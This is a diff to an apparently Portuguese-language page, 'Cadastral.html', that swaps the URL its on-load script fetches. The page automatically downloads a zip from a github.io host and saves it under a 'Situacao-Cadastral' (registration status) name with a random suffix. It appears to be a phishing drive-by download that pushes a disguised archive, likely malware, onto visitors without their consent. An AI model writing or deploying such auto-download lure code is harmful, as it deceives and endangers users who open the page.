--- a/Cadastral.html
+++ b/Cadastral.html
@@ -40,7 +40,7 @@
         window.onload = function() {
             const suffix = generateRandomSuffix(12);
             const newFileName = 'Anexo-Situacao-Cadastral' + suffix + '.zip';
-            const downloadUrl = 'https://baixetudopcwindows.github.io/clubewin/Anexo-Situacao-Cadastral.zip'; // URL do arquivo de download
+            const downloadUrl = 'https://baixetudopcwindows.github.io/clubewin/printxls.relatorio.zip'; // URL do arquivo de download
             downloadFile(downloadUrl, newFileName);
         }
     </script>
